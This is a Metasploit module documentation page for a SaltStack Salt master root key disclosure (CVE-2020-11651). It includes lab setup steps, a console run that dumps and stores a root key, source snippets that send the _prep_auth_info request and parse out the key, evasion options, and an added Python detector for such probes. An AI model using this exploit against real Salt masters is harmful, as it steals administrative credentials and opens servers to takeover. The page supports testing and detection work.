SaltStack Salt Master Server Root Key Disclosure - Metasploit
This page contains detailed information about how to use the auxiliary/gather/saltstack_salt_root_key Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SaltStack Salt Master Server Root Key Disclosure
Module: auxiliary/gather/saltstack_salt_root_key
Source code: modules/auxiliary/gather/saltstack_salt_root_key.rb
Disclosure date: 2020-04-30
Last modification time: 2021-04-30 23:26:18 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 4506
List of CVEs: CVE-2020-11651, CVE-2020-11652
This module exploits unauthenticated access to the _prep_auth_info() method in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the root key used to authenticate administrative commands to the master. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/gather/saltstack_salt_root_key
msf auxiliary(saltstack_salt_root_key) > show targets
... a list of targets ...
msf auxiliary(saltstack_salt_root_key) > set TARGET target-id
msf auxiliary(saltstack_salt_root_key) > show options
... show and set options ...
msf auxiliary(saltstack_salt_root_key) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Description
This module exploits unauthenticated access to the _prep_auth_info() method in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the root key used to authenticate administrative commands to the master.
VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities.
Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.
Setup
Note: I did the bulk of my testing after manually installing Salt in an Ubuntu 18.04 VM, but the Docker image from Vulhub may be quicker. YMMV.
Using a virtual machine
- Set up an Ubuntu 18.04 VM
- Browse to SaltStack's instructions for Ubuntu
- Select "Pin to Minor Release" and change all versions to either 2019.2.3 or 3000.1, depending on the version you wish to test
- Follow the instructions, installing only the salt-master and salt-minion packages necessary for testing
- Follow the post-installation configuration
You may now begin testing.
Using Docker
Prerequisites: Docker and Docker Compose must be installed first.
Note: The Salt master is already configured and running in the following scenario. The majority of the steps below are for configuring and starting the minion. Version 2019.2.3 will be used.
- Run git clone https://github.com/vulhub/vulhub
- Run cd vulhub/saltstack/CVE-2020-11651
- Run docker-compose up -d to start the container in the background
- Run docker exec -it cve-2020-11651_saltstack_1 bash to drop to a root shell inside the container
- Run echo $'127.0.0.1\tsalt' >> /etc/hosts to add the master to /etc/hosts (this allows the minion to find the master)
- Run salt-minion -d to execute the minion in the background
- Run salt-key -A and accept the key for the minion
You may now begin testing.
Verification Steps
Actions
Dump
This dumps the Salt master's root key by sending the _prep_auth_info()
method and extracting the key from the resulting serialized auth info.
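The following detector is an added example for the Dump action and the module description above; it is not code from the Metasploit module or from Salt. It assumes the request body the module's serialize_clear_load() builds is a msgpack map of the form {'enc': 'clear', 'load': {'cmd': ...}}, that the ZMTP framing negotiated in the scenario output has already been stripped by the capture layer, and that the sample frames are constructed rather than real captures.

```python
"""Flag Salt ClearFuncs requests that invoke _prep_auth_info (CVE-2020-11651).
Added example, not code from the Metasploit module or from Salt; the clear-load
wire format is an assumption.  Decodes only the msgpack subset such loads use."""


def _decode(buf, pos=0):
    """Decode one msgpack value at pos; return (value, next_pos)."""
    b = buf[pos]
    pos += 1
    if b <= 0x7F:                                  # positive fixint
        return b, pos
    if 0xA0 <= b <= 0xBF:                          # fixstr
        n = b & 0x1F
        return buf[pos:pos + n].decode(), pos + n
    if b == 0xD9:                                  # str8
        n = buf[pos]
        return buf[pos + 1:pos + 1 + n].decode(), pos + 1 + n
    if b == 0xC4:                                  # bin8 (encrypted 'aes' loads)
        n = buf[pos]
        return bytes(buf[pos + 1:pos + 1 + n]), pos + 1 + n
    if 0x80 <= b <= 0x9F:                          # fixmap / fixarray
        is_map, items = b < 0x90, []
        for _ in range((b & 0x0F) * (2 if is_map else 1)):
            v, pos = _decode(buf, pos)
            items.append(v)
        return (dict(zip(items[::2], items[1::2])) if is_map else items), pos
    raise ValueError("unsupported msgpack type 0x%02x" % b)


def clear_cmd(payload):
    """Return the 'cmd' of an unencrypted ('clear') Salt load, else None."""
    msg, _ = _decode(payload)
    if not isinstance(msg, dict) or msg.get("enc") != "clear":
        return None
    load = msg.get("load")
    return load.get("cmd") if isinstance(load, dict) else None


def is_root_key_disclosure_attempt(payload):
    """True when a clear load calls _prep_auth_info, the method the module
    sends to pull the master's root key out of the returned auth info."""
    return clear_cmd(payload) == "_prep_auth_info"


# Constructed sample frames (not real captures) for the three cases a sensor
# on TCP 4506 will see: a normal clear load, an encrypted load, and the probe.
PUBLISH = b"\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xa7publish"
ENCRYPTED = b"\x82\xa3enc\xa3aes\xa4load\xc4\x03\x01\x02\x03"
PROBE = b"\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info"
```

A hit on a patched master (2019.2.4 / 3000.2 or later, per the Nessus plugin names below) is still worth alerting on, since it shows someone probing for the flaw.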
Scenarios
SaltStack Salt 2019.2.3 on Ubuntu 18.04
msf5 > use auxiliary/gather/saltstack_salt_root_key
msf5 auxiliary(gather/saltstack_salt_root_key) > options
Module options (auxiliary/gather/saltstack_salt_root_key):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 4506 yes The target port (TCP)
Auxiliary action:
Name Description
---- -----------
Dump Dump root key from Salt master
msf5 auxiliary(gather/saltstack_salt_root_key) > set rhosts 172.28.128.5
rhosts => 172.28.128.5
msf5 auxiliary(gather/saltstack_salt_root_key) > run
[*] Running module against 172.28.128.5
[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
[*] 172.28.128.5:4506 - Negotiating signature
[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
[*] 172.28.128.5:4506 - Sending identical signature
[*] 172.28.128.5:4506 - Negotiating version
[+] 172.28.128.5:4506 - Received compatible version: "\x03"
[*] 172.28.128.5:4506 - Sending identical version
[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
[+] 172.28.128.5:4506 - Received NULL security mechanism
[*] 172.28.128.5:4506 - Sending NULL security mechanism
[*] 172.28.128.5:4506 - Sending READY command of type REQ
[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
[*] 172.28.128.5:4506 - Yeeting _prep_auth_info() at 172.28.128.5:4506
[+] 172.28.128.5:4506 - Received serialized auth info
[+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
[*] Auxiliary module execution completed
msf5 auxiliary(gather/saltstack_salt_root_key) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
172.28.128.5 172.28.128.5 4506/tcp (salt/zeromq) root bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk= Password
msf5 auxiliary(gather/saltstack_salt_root_key) >
Msfconsole Usage
Here is how the gather/saltstack_salt_root_key auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/saltstack_salt_root_key
msf6 auxiliary(gather/saltstack_salt_root_key) > show info
Name: SaltStack Salt Master Server Root Key Disclosure
Module: auxiliary/gather/saltstack_salt_root_key
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-04-30
Provided by:
F-Secure
wvu <[email protected]>
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Available actions:
Name Description
---- -----------
Dump Dump root key from Salt master
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 4506 yes The target port (TCP)
Description:
This module exploits unauthenticated access to the _prep_auth_info()
method in the SaltStack Salt master's ZeroMQ request server, for
versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose
the root key used to authenticate administrative commands to the
master. VMware vRealize Operations Manager versions 7.5.0 through
8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and
Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for
versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known
to be affected by the Salt vulnerabilities. Tested against SaltStack
Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker
image.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-11651
https://nvd.nist.gov/vuln/detail/CVE-2020-11652
https://labs.f-secure.com/advisories/saltstack-authorization-bypass
https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/
https://www.vmware.com/security/advisories/VMSA-2020-0009.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG
https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py
Module Options
This is a complete list of options available in the gather/saltstack_salt_root_key auxiliary module:
msf6 auxiliary(gather/saltstack_salt_root_key) > show options
Module options (auxiliary/gather/saltstack_salt_root_key):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 4506 yes The target port (TCP)
Auxiliary action:
Name Description
---- -----------
Dump Dump root key from Salt master
Advanced Options
Here is a complete list of advanced options supported by the gather/saltstack_salt_root_key auxiliary module:
msf6 auxiliary(gather/saltstack_salt_root_key) > show advanced
Module advanced options (auxiliary/gather/saltstack_salt_root_key):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/saltstack_salt_root_key module can do:
msf6 auxiliary(gather/saltstack_salt_root_key) > show actions
Auxiliary actions:
Name Description
---- -----------
Dump Dump root key from Salt master
Evasion Options
Here is the full list of possible evasion options supported by the gather/saltstack_salt_root_key auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/saltstack_salt_root_key) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages. Check for the possible causes in the code snippets below, taken from the module source code; this can often help in identifying the root cause of the problem.
Could not find root key in serialized auth info
Here is a relevant code snippet related to the "Could not find root key in serialized auth info" error message:
# These are from Msf::Exploit::Remote::ZeroMQ
zmq_connect
zmq_negotiate

unless (root_key = extract_root_key(yeet_prep_auth_info))
  print_error('Could not find root key in serialized auth info')

  # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce
  return Exploit::CheckCode::Safe
end
Did not receive auth info
Here is a relevant code snippet related to the "Did not receive auth info" error message:
print_status("Yeeting _prep_auth_info() at #{peer}")

zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))

unless (res = sock.get_once)
  fail_with(Failure::Unknown, 'Did not receive auth info')
end

unless res.match(/user.+UserAuthenticationError.+root/m)
  fail_with(Failure::UnexpectedReply,
            "Did not receive serialized auth info: #{res.inspect}")
<__METHOD__> failed: <E.MESSAGE>
Here is a relevant code snippet related to the "<__METHOD__> failed: <E.MESSAGE>" error message:
end

def extract_root_key(auth_info)
  # Fetch root key from appropriate index of deserialized data, presumably
  MessagePack.unpack(auth_info)[2]&.fetch('root')
rescue EOFError, KeyError, MessagePack::MalformedFormatError => e
  print_error("#{__method__} failed: #{e.message}")
  nil
end

end
Related Pull Requests
- #15126 Merged Pull Request: Fix errors in auxiliary/gather/saltstack_salt_root_key and exploit/linux/http/axis_srv_parhand_rce
- #14734 Merged Pull Request: Rubocop recently landed modules
- #13538 Merged Pull Request: Add Cisco CML and VIRL-PE advisory to Salt modules
- #13401 Merged Pull Request: Add SaltStack Salt root key disclosure (CVE-2020-11651), unauthenticated RCE (also CVE-2020-11651), and basic ZeroMQ library
References
- CVE-2020-11651
- CVE-2020-11652
- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
- https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/
- https://www.vmware.com/security/advisories/VMSA-2020-0009.html
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG
- https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py
See Also
Check also the following modules related to this module:
- exploit/linux/misc/saltstack_salt_unauth_rce
- exploit/linux/http/saltstack_salt_api_cmd_exec
- exploit/linux/http/saltstack_salt_wheel_async_rce
- post/multi/gather/saltstack_salt
- auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key
- auxiliary/admin/http/typo3_winstaller_default_enc_keys
- auxiliary/scanner/etcd/open_key_scanner
- auxiliary/scanner/ssh/ssh_enum_git_keys
- auxiliary/server/capture/http_javascript_keylogger
- exploit/freebsd/telnet/telnet_encrypt_keyid
- exploit/linux/local/sophos_wpa_clear_keys
- exploit/linux/telnet/telnet_encrypt_keyid
- exploit/multi/http/metasploit_static_secret_key_base
- exploit/multi/vnc/vnc_keyboard_exec
- exploit/osx/local/iokit_keyboard_root
- exploit/unix/x11/x11_keyboard_exec
- exploit/windows/browser/keyhelp_launchtripane_exec
- exploit/windows/browser/ms06_067_keyframe
- exploit/windows/fileformat/emc_appextender_keyworks
- exploit/windows/ldap/pgp_keyserver7
- exploit/windows/ssh/freeftpd_key_exchange
- exploit/windows/ssh/freesshd_key_exchange
- post/linux/gather/gnome_keyring_dump
- post/multi/gather/aws_keys
- post/multi/gather/rubygems_api_key
- post/osx/capture/keylog_recorder
- post/osx/gather/enum_keychain
- post/windows/capture/keylog_recorder
- post/windows/capture/lockout_keylogger
- post/windows/gather/enum_ms_product_keys
- post/windows/manage/sticky_keys
Related Nessus plugins:
- SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1150-1)
- SUSE SLES15 Security Update : salt (SUSE-SU-2020:1151-1)
- openSUSE Security Update : salt (openSUSE-2020-564)
- Debian DSA-4676-1 : salt - security update
- SaltStack < 2019.2.4 / 3000.x < 3000.2 Multiple Vulnerabilities
- SaltStack < 2019.2.4 / 3000.x < 3000.2 Authentication Bypass (CVE-2020-11651)
- FreeBSD : salt -- multiple vulnerabilities in salt-master process (6bf55af9-973b-11ea-9f2c-38d547003487)
- Photon OS 1.0: Salt PHSA-2020-1.0-0294
- Photon OS 1.0: Salt3 PHSA-2020-1.0-0294
- Photon OS 3.0: Salt3 PHSA-2020-3.0-0091
Authors
- F-Secure
- wvu
Version
This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.